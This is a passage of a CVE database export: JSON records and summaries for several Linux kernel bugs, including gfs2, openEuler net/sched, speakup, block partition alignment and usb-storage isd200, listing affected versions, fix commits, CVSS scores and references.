"url": "https://git.kernel.org/stable/c/ee0586d73cbaf0e7058bc640d62a9daf2dfa9178"
},
{
"url": "https://git.kernel.org/stable/c/d69d7804cf9e2ba171a27e5f98bc266f13d0414a"
},
{
"url": "https://git.kernel.org/stable/c/067a7c48c2c70f05f9460d6f0e8423e234729f05"
},
{
"url": "https://git.kernel.org/stable/c/c323efd620c741168c8e0cc6fc0be04ab57e331a"
},
{
"url": "https://git.kernel.org/stable/c/8877243beafa7c6bfc42022cbfdf9e39b25bd4fa"
}
],
"title": "gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52448",
"datePublished": "2024-02-22T16:21:39.915Z",
"dateReserved": "2024-02-20T12:30:33.292Z",
"dateUpdated": "2025-05-04T07:36:45.265Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-33630 (GCVE-0-2021-33630)
Vulnerability from cvelistv5
Published
2024-01-18 15:00
Modified
2025-05-07 20:14
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.
This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:58:21.572Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1030"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031"
},
{
"tags": [
"x_transferred"
],
"url": "https://gitee.com/src-openeuler/kernel/pulls/1389"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e8b9bfa110896f95d602d8c98d5f9d67e41d78c"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/9"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/10"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/31/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/31/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/02/02/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/02/02/9"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/02/03/1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-33630",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-07T20:14:40.648453Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-07T20:14:53.453Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://gitee.com/src-openeuler",
"defaultStatus": "unaffected",
"modules": [
"network"
],
"packageName": "kernel",
"platforms": [
"Linux"
],
"product": "kernel",
"programFiles": [
"https://gitee.com/openeuler/kernel/blob/openEuler-1.0-LTS/net/sched/sch_cbs.c"
],
"repo": "https://gitee.com/src-openeuler/kernel",
"vendor": "openEuler",
"versions": [
{
"changes": [
{
"at": "b2239f607df25fc401179e6dd4b7406f942a7632 net/sched: cbs: Fix not adding cbs instance to list",
"status": "unaffected"
}
],
"lessThan": "4.19.90-2401.3",
"status": "affected",
"version": "4.19.90",
"versionType": "git"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation.\u003cp\u003e This vulnerability is associated with program files \u003ctt\u003enet/sched/sch_cbs.C\u003c/tt\u003e.\u003c/p\u003e\u003cp\u003eThis issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.\u003c/p\u003e"
}
],
"value": "NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.\n\nThis issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3."
}
],
"impacts": [
{
"capecId": "CAPEC-129",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-129 Pointer Manipulation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:09:01.557Z",
"orgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2",
"shortName": "openEuler"
},
"references": [
{
"url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1030"
},
{
"url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031"
},
{
"url": "https://gitee.com/src-openeuler/kernel/pulls/1389"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e8b9bfa110896f95d602d8c98d5f9d67e41d78c"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/9"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/30/10"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/31/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/31/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/02/02/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/02/02/9"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/02/03/1"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "NULL-ptr-deref in network sched",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2",
"assignerShortName": "openEuler",
"cveId": "CVE-2021-33630",
"datePublished": "2024-01-18T15:00:49.312Z",
"dateReserved": "2021-05-28T14:26:05.940Z",
"dateUpdated": "2025-05-07T20:14:53.453Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26994 (GCVE-0-2024-26994)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:15
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
speakup: Avoid crash on very long word
In case a console is set up really large and contains a really long word
(> 256 characters), we have to stop before the length of the word buffer.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 Version: c6e3fd22cd538365bfeb82997d5b89562e077d42 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26994",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T14:52:12.815212Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T16:48:53.206Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:15:52.431Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/756c5cb7c09e537b87b5d3acafcb101b2ccf394f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f6b62125befe1675446923e4171eac2c012959c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6401038acfa24cba9c28cce410b7505efadd0222"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d130158db29f5e0b3893154908cf618896450a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89af25bd4b4bf6a71295f07e07a8ae7dc03c6595"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8defb1d22ba0395b81feb963b96e252b097ba76f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0efb15c14c493263cb3a5f65f5ddfd4603d19a76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "756c5cb7c09e537b87b5d3acafcb101b2ccf394f",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "8f6b62125befe1675446923e4171eac2c012959c",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "6401038acfa24cba9c28cce410b7505efadd0222",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "0d130158db29f5e0b3893154908cf618896450a8",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "89af25bd4b4bf6a71295f07e07a8ae7dc03c6595",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "8defb1d22ba0395b81feb963b96e252b097ba76f",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "0efb15c14c493263cb3a5f65f5ddfd4603d19a76",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
},
{
"lessThan": "c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1",
"status": "affected",
"version": "c6e3fd22cd538365bfeb82997d5b89562e077d42",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.37"
},
{
"lessThan": "2.6.37",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspeakup: Avoid crash on very long word\n\nIn case a console is set up really large and contains a really long word\n(\u003e 256 characters), we have to stop before the length of the word buffer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:43.363Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/756c5cb7c09e537b87b5d3acafcb101b2ccf394f"
},
{
"url": "https://git.kernel.org/stable/c/8f6b62125befe1675446923e4171eac2c012959c"
},
{
"url": "https://git.kernel.org/stable/c/6401038acfa24cba9c28cce410b7505efadd0222"
},
{
"url": "https://git.kernel.org/stable/c/0d130158db29f5e0b3893154908cf618896450a8"
},
{
"url": "https://git.kernel.org/stable/c/89af25bd4b4bf6a71295f07e07a8ae7dc03c6595"
},
{
"url": "https://git.kernel.org/stable/c/8defb1d22ba0395b81feb963b96e252b097ba76f"
},
{
"url": "https://git.kernel.org/stable/c/0efb15c14c493263cb3a5f65f5ddfd4603d19a76"
},
{
"url": "https://git.kernel.org/stable/c/c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1"
}
],
"title": "speakup: Avoid crash on very long word",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26994",
"datePublished": "2024-05-01T05:28:07.350Z",
"dateReserved": "2024-02-19T14:20:24.206Z",
"dateUpdated": "2025-11-04T17:15:52.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52458 (GCVE-0-2023-52458)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: add check that partition length needs to be aligned with block size
Before calling add partition or resize partition, there is no check
on whether the length is aligned with the logical block size.
If the logical block size of the disk is larger than 512 bytes,
then the partition size maybe not the multiple of the logical block size,
and when the last sector is read, bio_truncate() will adjust the bio size,
resulting in an IO error if the size of the read command is smaller than
the logical block size.If integrity data is supported, this will also
result in a null pointer dereference when calling bio_integrity_free.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52458",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-26T17:05:34.872000Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:59.886Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.831Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5010c27120962c85d2f421d2cf211791c9603503"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef31cc87794731ffcb578a195a2c47d744e25fb8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f64f866aa1ae6975c95d805ed51d7e9433a0016"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5010c27120962c85d2f421d2cf211791c9603503",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ef31cc87794731ffcb578a195a2c47d744e25fb8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6f64f866aa1ae6975c95d805ed51d7e9433a0016",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: add check that partition length needs to be aligned with block size\n\nBefore calling add partition or resize partition, there is no check\non whether the length is aligned with the logical block size.\nIf the logical block size of the disk is larger than 512 bytes,\nthen the partition size maybe not the multiple of the logical block size,\nand when the last sector is read, bio_truncate() will adjust the bio size,\nresulting in an IO error if the size of the read command is smaller than\nthe logical block size.If integrity data is supported, this will also\nresult in a null pointer dereference when calling bio_integrity_free."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:03.432Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62"
},
{
"url": "https://git.kernel.org/stable/c/5010c27120962c85d2f421d2cf211791c9603503"
},
{
"url": "https://git.kernel.org/stable/c/ef31cc87794731ffcb578a195a2c47d744e25fb8"
},
{
"url": "https://git.kernel.org/stable/c/cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8"
},
{
"url": "https://git.kernel.org/stable/c/bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5"
},
{
"url": "https://git.kernel.org/stable/c/6f64f866aa1ae6975c95d805ed51d7e9433a0016"
}
],
"title": "block: add check that partition length needs to be aligned with block size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52458",
"datePublished": "2024-02-23T14:46:20.397Z",
"dateReserved": "2024-02-20T12:30:33.294Z",
"dateUpdated": "2025-05-04T07:37:03.432Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27059 (GCVE-0-2024-27059)
Vulnerability from cvelistv5
Published
2024-05-01 13:00
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command
The isd200 sub-driver in usb-storage uses the HEADS and SECTORS values
in the ATA ID information to calculate cylinder and head values when
creating a CDB for READ or WRITE commands. The calculation involves
division and modulus operations, which will cause a crash if either of
these values is 0. While this never happens with a genuine device, it
could happen with a flawed or subversive emulation, as reported by the
syzbot fuzzer.
Protect against this possibility by refusing to bind to the device if
either the ATA_ID_HEADS or ATA_ID_SECTORS value in the device's ID
information is 0. This requires isd200_Initialization() to return a
negative error code when initialization fails; currently it always
returns 0 (even when there is an error).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27059",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-09T18:38:40.955330Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:17.539Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9968c701cba7eda42e5f0052b040349d6222ae34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb7b01ca778170654e1c76950024270ba74b121f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/284fb1003d5da111019b9e0bf99b084fd71ac133"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c1f36d92c0a8799569055012665d2bb066fb964"
},
{
"tags": [
"x_transferred"
],
